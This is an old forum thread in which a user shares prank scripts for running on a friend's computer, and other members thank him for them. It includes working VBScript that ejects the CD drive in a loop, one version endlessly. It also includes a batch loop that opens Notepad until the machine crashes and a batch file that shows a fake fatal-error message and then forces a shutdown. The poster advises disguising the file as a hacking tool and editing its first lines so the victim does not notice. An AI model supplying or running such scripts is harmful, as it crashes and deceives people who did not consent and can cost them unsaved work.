VBS Scripts

This is a discussion on VBS Scripts within the Computer guides forum part of the Software/Hardware category; Hey guys. I just remember back when I started to do things with pc.. A friend showed me some cool ...


+ Reply to Thread
Results 1 to 7 of 7

Thread: VBS Scripts

  1. #1
    Tracky's Avatar
    Tracky is online now Evul Guy :D


    Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of
    Join Date
    Dec 2007
    Location
    Germany
    Posts
    2,133
    Downloads
    52
    Uploads
    0
    Rep Power
    9
    Reputation
    1161

    VBS Scripts

    Hey guys. I just remember back when I started to do things with pc.. A friend showed me some cool tricks with VBS Scripts. They're not that difficult to make but they are worth to send a friend

    So I remember back of a cool Script that opens / closes your Cdrom Drive as often as you want it to.
    Just upload this file on a friends PC and when he is on toilet or something like this just open the file and put in 9999999 in the field
    And when he comes back just say " Woot. Your PC is fucked up o_O "
    The next thing you could do is, just say your friend this file is for I don't know.. hacking or whatever he could believe. And say him a long number as a code he has to enter. Before you send him the file, you should change the first lines in the code to something else. So your friend won't notice what will happen that fast..

    So heres the " Code " for this file..
    Code:
    HowOften = Inputbox("How often should it become opened and closed ?")
    Set oWMP = CreateObject("WMPlayer.OCX" )
    Set colCDROMs = oWMP.cdromCollection
    
    For x=0 to WieOft
    'open
    If colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    End If
    
    Wscript.Sleep 100
    'close
    If colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    End If
    Next
    
    Just open Editor / Notepad, copy&paste this code into it and save it as ENTERHERETHENAME.vbs!


    When you click on ENTERHERETHENAME.exe a windows will appear where you have to put in a number.
    This number contains how OFTEN your Cdrom Drive will open / close.
    Notice: Sometimes it opens/closes more often than you typed in. I don't know why..

    Use this on your own risk. I got no damage so far.
    __________________________________________________ __________________________________________________ __________

    Okay. Here's another " version " of the code. I just asked a good friend and he made me remember the old " code "
    Code:
    Set oWMP = CreateObject("WMPlayer.OCX.7")
    Set colCDROMs = oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    End If
    wscript.sleep 100
    loop
    
    -> You have to do exactly the same like with the other code. Just read through it
    __________________________________________________ __________________________________________________ __________

    This one will open notepad endless, until your PC crashed because he's not good enough
    I think this will pwn every PC.. Just needs some more time sometimes
    Code:
    @ECHO off
    :top
    START %SystemRoot%\system32\notepad.exe
    GOTO top
    
    And here you have to do exactly the same aswell..
    __________________________________________________ __________________________________________________ __________

    This one will close the PC within 10 seconds. You can change the number to change the time ( in seconds )
    Remember not to open them yourself
    Code:
    @echo off
    msg * Fatal System Error! You should reinstall your Windows within the next start!
    shutdown -c "Error! Take care of your PC!" -s -t 10
    
    __________________________________________________ __________________________________________________ __________

    I hope you enjoy it. When you got some more Scripts, just PM me and I'll include them here with credits to you!
    Best regards, Tracky.
    Last edited by Tracky; 09-14-2009 at 05:49 PM.

    Yeah, I got this Tshirt <3

  2. The Following 4 Users Say Thank You to Tracky For This Useful Post:


  3. #2
    mr_ice's Avatar
    mr_ice is offline Advanced Hacker
    mr_ice is a jewel in the rough mr_ice is a jewel in the rough mr_ice is a jewel in the rough mr_ice is a jewel in the rough
    Join Date
    Oct 2008
    Location
    Croatia, Hrvatska
    Posts
    352
    Downloads
    5
    Uploads
    0
    Rep Power
    3
    Reputation
    311
    Wow knew about restart but didn't know with cd thing very nice.

    Its a long way to heaven.

  4. #3
    Flying Panda's Avatar
    Flying Panda is offline My Mommy Says Im Special
    Flying Panda is a name known to all Flying Panda is a name known to all Flying Panda is a name known to all Flying Panda is a name known to all Flying Panda is a name known to all Flying Panda is a name known to all
    Join Date
    Jan 2009
    Location
    Serbia,Europe.
    Posts
    498
    Downloads
    2
    Uploads
    0
    Rep Power
    4
    Reputation
    561
    Yup,pretty nice scripts.Thanks.

  5. #4
    Serverman's Avatar
    Serverman is offline Paranoia!

    Serverman has much to be proud of Serverman has much to be proud of Serverman has much to be proud of Serverman has much to be proud of Serverman has much to be proud of Serverman has much to be proud of Serverman has much to be proud of Serverman has much to be proud of Serverman has much to be proud of
    Join Date
    Jan 2008
    Posts
    3,030
    Downloads
    19
    Uploads
    0
    Rep Power
    9
    Reputation
    1120
    Seen this a million times
    tho

    Seriously! He did!

  6. #5
    kwoxer's Avatar
    kwoxer is offline Advanced Hacker
    kwoxer is on a distinguished road
    Join Date
    Jul 2007
    Posts
    310
    Downloads
    6
    Uploads
    0
    Rep Power
    3
    Reputation
    37
    nice tracky, cool scripts
    kwoxer.de - das kwoxt

  7. #6
    Tracky's Avatar
    Tracky is online now Evul Guy :D


    Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of Tracky has much to be proud of
    Join Date
    Dec 2007
    Location
    Germany
    Posts
    2,133
    Downloads
    52
    Uploads
    0
    Rep Power
    9
    Reputation
    1161
    Thank y'all
    And notice, when you got some more Scripts you want to add, just feel free to PM me so we can make 1 BIG Thread instead of 10000 millions posts Thread

    Yeah, I got this Tshirt <3

  8. #7
    NoDenial's Avatar
    NoDenial is offline Mentor
    NoDenial is on a distinguished road
    Join Date
    Oct 2009
    Posts
    118
    Downloads
    0
    Uploads
    0
    Rep Power
    1
    Reputation
    32
    I remember a VBS script that keeps repeating the words you type in

    Anyone know how to do it again?

    Sorry for bumping the thread,just wanted to know how to make the VBS script that keeps repeating the words.

+ Reply to Thread

Similar Threads

  1. Replies: 9
    Last Post: 09-22-2009, 08:34 PM
  2. Package with autos+Scar scripts
    By tschoerk in forum Runescape
    Replies: 4
    Last Post: 10-23-2007, 04:18 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts